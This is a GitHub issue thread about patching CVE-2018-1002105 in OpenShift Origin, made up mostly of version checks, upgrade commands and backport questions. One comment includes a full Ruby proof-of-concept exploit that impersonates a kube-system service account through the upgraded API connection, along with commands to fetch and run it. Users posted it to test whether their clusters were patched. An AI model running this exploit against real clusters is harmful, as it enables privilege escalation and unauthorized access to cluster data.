Closed clcollins closed 4 years ago
It kind of looks like a new openshift/origin-control-plane:v3.10.0 was released last night. I also saw this in the git log
of the release-3.10
branch:
commit 8a7096453e33bb8992c6d3c3c90116a8088902b0
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date: Mon Dec 3 16:20:34 2018 -0800
Merge pull request #21601 from deads2k/cve-23-ok-3.10
UPSTREAM: 00000: Verify backend upgrade
I'd love to hear from the devs tho
Does anyone have a Proof of Concept or test harness of sorts short of checking the container version besides read the exploit and figure out how all of this port handing goes?
So 4 hrs in and not a word? I know these bits are "free as in beer", but it's still important that the people drinking the free beer aren't drinking poison... If I didn't know any better, I'd think that the lack of messaging was by design?
Send my regards to whoever my Solutions Architect is now that he's a chief architect as we are/were so close to at least getting pricing... But this... C'mon.
Is the origin-control-plane:v3.10.0 pushed to docker hub last night free of this CVE or nawh?
I would also like to know if the fix will be back ported to 3.6?
Ok well in terms of 3.10, the binaries in the origin-control-plane:v3.10.0 container both have a symbol for proxy.getResponseCode
and have a version string which includes the first 8 chars of @deads2k last PR merge.
# oc -n kube-system rsh master-api-[redacted]
sh-4.2# nm openshift | egrep getResponseCode
00000000014b79b0 t github.com/openshift/origin/vendor/k8s.io/apimachinery/pkg/util/proxy.getResponseCode
sh-4.2# ./openshift version
openshift v3.10.0+8a70964-87
func getResponseCode(r io.Reader) (int, []byte, error) {
- this method was added witth the patch
commit 8a7096453e33bb8992c6d3c3c90116a8088902b0 (HEAD -> release-3.10, origin/release-3.10)
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date: Mon Dec 3 16:20:34 2018 -0800
Merge pull request #21601 from deads2k/cve-23-ok-3.10
UPSTREAM: 00000: Verify backend upgrade
Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...
Some question ?
This backport mitigating the API Extension attack (OCP 3.6 -> 3.11) ?
What about the pod exec/attach/port-forward attack (OCP 3.2->3.11) ?
What about 3.9. version - can we expect updates here as well ?
How this one was solved ?
Thanks in advance
Generally speaking, there is no confirmation that the fix from above is actually a fix for this issue. Maybe a developer could approve that this is fixed with this commit and that the latest docker images (from which date on) contain this fix.
Any progress?
You can test for the presence of this vulnerability in the latest build of OKD using this container from Gravitational (the gravitational/cve-2018-1002105:latest image is hosted on Quay, and itself shows no vulnerabilities): https://github.com/gravitational/cve-2018-1002105
I am on the lastest v3.11 and I am getting: [root@baleia cve-2018-1002105]# go run main.go Attempting to locate and load kubeconfig file Loading: /root/.kube/config Testing for unauthenticated access...
API allows unauthenticated access Testing for privilege escalation... API is vulnerable to CVE-2018-1002105
@gfvirga
I have the same issue. I'm using v3.9.0 with mitigation applied and have he same output. When you look on the code, in the first step it's testing simply https://
Or.... I simply doing something wrong :)
You can't hit the loadbalancer. It caught me at first, but I saw in the README.md that is a problem. I find it best to create a new kubeconfig and feed it into the container or pass it to the go app.
You also need list pods in all namespaces as well as list all namespaces as that is the discovery process of this app... IOW create a clusterrole (and clusterrolebinding):
# oc get clusterroles/listns -o yaml
apiVersion: authorization.openshift.io/v1
kind: ClusterRole
metadata:
name: listns
rules:
- apiGroups:
- ""
attributeRestrictions: null
resources:
- namespaces
- pods
verbs:
- get
- list
I found a simple test (exploit) described in this blog by Ariel Zalivansky (the author used Ubuntu, but you can port it easily to Centos/RHEL):
apt-get update && apt-get install -y ruby git
git clone https://gist.github.com/2d09ec0ad600667980359394a2a65a0d.git
cd 2d09ec0ad600667980359394a2a65a0d/
chmod +x poc.rb
./poc.rb
Note that before executing the Ruby script in the final line you will probably need to modify the 'host = 'kubernetes'` variable in your local copy of poc.rb.
For posterity, poc.rb contains the following code:
#!/usr/bin/env ruby
require 'socket'
require 'openssl'
require 'json'
host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'
sock = TCPSocket.new host, 443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect
ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }
puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close
Actually I tested this procedure manually and I was able to exploit the CVE if both pods run on the same node. I tried the same on 3.11 (installed 60 minutes ago) and it seems to be not exploitable.
Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...
We upgraded one of our environments from 3.9 to 3.10 4 days ago and appear to have the patched version sh-4.2# openshift version openshift v3.10.0+8a70964-87
We previously upgraded another envionment (12 days ago) and as expected it has the not-yet-patched version of 3.10 sh-4.2# openshift version openshift v3.10.0+9e57eff-83
However, when re-running the /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment, it does not upgrade it. The control plane binaries remain at openshift v3.10.0+9e57eff-83 ?
@mshutt How did you update your existing 3.10 environment?
Howdy @skynardo. I just wrote a playbook that does a docker pull... and if changed, it does the /usr/local/bin/restart-masters (or something like that) for both the api and controller... and it has a serial of 1 and a delay period between iterations.
On Mon, Dec 10, 2018 at 3:27 PM skynardo notifications@github.com wrote:
Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...
We upgraded one of our environments from 3.9 to 3.10 4 days ago and appear to have the patched version sh-4.2# openshift version openshift v3.10.0+8a70964-87
We previously upgraded another envionment (12 days ago) and as expected it has the not-yet-patched version of 3.10 sh-4.2# openshift version openshift v3.10.0+9e57eff-83
However, when re-running the /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment, it does not upgrade it. The control plane binaries remain at openshift v3.10.0+9e57eff-83 ?
@mshutt https://github.com/mshutt How did you update your existing 3.10 environment?
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-445960289, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9txv9OITGM-Dilj5M7j2EUUA3g_9ks5u3sOYgaJpZM4ZApNK .
Thanks, will give that a go.
I use version 3.7. Will it be a patch available for this version?
@mshutt Would it be possible to share that playbook?
@morodin , I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"
That only gets one master but....
On Thu, Dec 13, 2018, 5:49 AM skynardo <notifications@github.com wrote:
@mshutt https://github.com/mshutt, I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-446974567, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9o_2jH27p1HMw2MST2xQMLKVkR9Tks5u4lr1gaJpZM4ZApNK .
And I'm not sure that's right... We used v3.10.0
On Thu, Dec 13, 2018, 5:49 AM skynardo <notifications@github.com wrote:
@mshutt https://github.com/mshutt, I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-446974567, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9o_2jH27p1HMw2MST2xQMLKVkR9Tks5u4lr1gaJpZM4ZApNK .
Thanks for that, it might be easier than running the upgrade playbook (which seem to work in our case) .
@morodin - we ran the upgrade playbook too. I still had to manually pull the new images for some reason.
We also ran into issues with the origin-node container stopping but not being removed, so the systemd origin-node.service would not start, and I had to delete the container with runc to get it to continue. Did you run into either of those issues?
@clcollins No, our upgrade run through without issues, pulling Version "v3.10.0+8a70964-87", which should be the patched one.
@clcollins when you say origin-node container are you referring to the sync pods in the openshift-node project? I see that these pods are still running openshift v3.10.0+9e57eff-83 in our environment that was upgraded to 3.10 prior to the fix. @mshutt, thanks for the correction on v3.10.0
@skynardo That was clcollins given that Statement.
@morodin, are you saying that you had an existing 3.10 environment that was NOT at v3.10.0+8a70964-87, and you ran the upgrade playbook again and it deployed the patched version ? (v3.10.0+8a70964-87). I have not been able to make that work. Might try newer playbooks today.
@skynardo Yes, that is exactly what I did. Just using the 3.10 upgrade playbook from the centos openshift-ansible package.
@skynardo: Not the sync node, but the origin-node container being run by the systemd origin-node service with runc, from /etc/systemd/system/origin-node.service
.
# runc list
ID PID STATUS BUNDLE CREATED OWNER
origin-node 29457 running /var/lib/containers/atomic/origin-node.0 2018-12-12T15:06:09.801904732Z root
I think the sync node from the sync daemonset is running via Docker.
docker ps |grep sync
042835e362c3 8546ec1d6700 "/bin/bash -c '#!/..." 2 days ago Up 2 days
That's not the one that failed to be removed.
Does this patch for 3.7 also work with okd? https://access.redhat.com/errata/RHSA-2018:2906
@clcollins, I don't have runc installed on my masters/nodes. Are you running containerized install maybe?
I did try to run the latest version of the 3.10 playbooks and they fail when trying to restart node service on master[0]. We are running origin 3.10 on AWS EC2 using advanced install method, upgraded from 3.9 cluster.
systemctl status origin-node ● origin-node.service - OpenShift Node Loaded: loaded (/etc/systemd/system/origin-node.service; enabled; vendor preset: disabled) Active: active (running) since Thu 2018-12-20 12:02:43 UTC; 8h ago Docs: https://github.com/openshift/origin Main PID: 3712 (hyperkube) Memory: 67.9M CGroup: /system.slice/origin-node.service ...
@skynardo: Ah, yes, sorry - we are using the containerized install on Atomic hosts. We're using 3.11, with on-prem virtual machines.
If you need an unofficial confirmation that CVE-2018-1002105 was patched in OKD (master branch head) on Nov 08, just compare the openshift/origin patch in the upgradeaware.go with kubernetes/kubernetes original patch - they are identical.
Patch to Kubernetes' upgradeaware.go: Verify backend upgraded connection
Patch to OKD's upgradeaware.go: (just click Load Diff) UPSTREAM: 00000: Verify backend upgrade
The patched file is here. This issue should remain open until we get a release incorporating the patch. Most likely there will be no backports to older versions...
@mirekphd I'd personally leave it open in protest. The CVE was so heinous that free as in beer vs. free as in speech ought not even be a matter for discussion.
That said it is patched clear back into at least the 3.9 release branch, I believe. Bins (containers) were stealth cut for at least 3.10 and I presume other releases
i am running okd 3.9 with advanced installation. I am not really sure how to patch it. Any Idea ?
This went out back to 3.9 when the embargo was released, and rolling images and rpms were built at that time (with the centos PaaS sig releasing new rpms).
There was a discussion on the mailing list about why the rolling releases model is used, but it effectively allows us to ensure new clusters and new nodes are always at latest. It does mean that you need to run an upgrade or pull latest images on control plane nodes, but that’s always been the case.
https://lists.openshift.redhat.com/openshift-archives/dev/2018-December/msg00014.html
I think I was wrong in this, it looks like David did backport it would have been in the rpms published to gcs and the rolling images.
@smarterclayton hey, thanks for the answer. However I see that the Paas sig repos still have no updates which leave a lot of openshift origin users in a vulnerable state.
From what I read on the mailing list they need to have a tag on git to be able to build a new version. Could you please either create a v3.11.1 tag or recreate the v3.11 so that Paas could rebuild the rpms with the patch?
@DanyC97 can you describe why you need a tag to rebuild? Can't you just generate a patch level build by refreshing the source tar?
@smarterclayton re-reading the mailing list just now he asked for a release, I assumed @DanyC97 meant git tag but maybe it is a github release? For clarity here is the quote :
the fix to make it into 3.11/3.10 Origin branches => done [1] however i am just guessing those are the right PRs, someone from RH will need to confirm/ refute a new Origin release to be cut for 3.11/3.10 then i can start with the PaaS Sig work
Is it fixed or not in Origin?
It's mostly fixed.
The PRs were backported to the 3.10 and 3.11 branches and the Docker containers were rebuilt: https://hub.docker.com/r/openshift/origin-control-plane/tags
However, the CentOS PaaS release repos were NOT rebuilt, so if you run a non-containerized deployment with the master deployed from RPMs, you're still vulnerable, and you should upgrade to 3.11, which runs the master services via static kubelet pods.
okd/origin is a community effort, particularly the binary builds, and if you run it in production, I would highly recommend to familiarize yourself with the release and backporting process on GitHub to that you can see for yourself which fixes got backported. Support for older releases can be hit-and-miss.
If you want actionable security bulletins and dependable long-term support, a Red Hat subscription would be your best bet. Like any community project, OKD is more of a DIY solution (though very close to upstream).
Issues go stale after 90d of inactivity.
Mark the issue as fresh by commenting /remove-lifecycle stale
.
Stale issues rot after an additional 30d of inactivity and eventually close.
Exclude this issue from closing by commenting /lifecycle frozen
.
If this issue is safe to close now please do so with /close
.
/lifecycle stale
Stale issues rot after 30d of inactivity.
Mark the issue as fresh by commenting /remove-lifecycle rotten
.
Rotten issues close after an additional 30d of inactivity.
Exclude this issue from closing by commenting /lifecycle frozen
.
If this issue is safe to close now please do so with /close
.
/lifecycle rotten /remove-lifecycle stale
Rotten issues close after 30d of inactivity.
Reopen the issue by commenting /reopen
.
Mark the issue as fresh by commenting /remove-lifecycle rotten
.
Exclude this issue from closing again by commenting /lifecycle frozen
.
/close
@openshift-bot: Closing this issue.
It appears that Kubernetes has patched v1.10.11, v1.11.5, and v1.12.3 for CVE-2018-1002105, the pod exec/attach/port-forward attack and API Extension attack(s) that were released yesterday(?). Downstream OCP has either a patch or mitigation available. I don't see any mention of the CVE in Origin in either the issues or commits yet (apologies if I'm missing something).
Is there a tracker for watching patches as applied to Origin, and when they are, can they immediately be applied using the documented upgrade process using OpenShift Ansible? Or are there changes needed there as well?
Thanks!
Edit: FWIW, we're running v3.11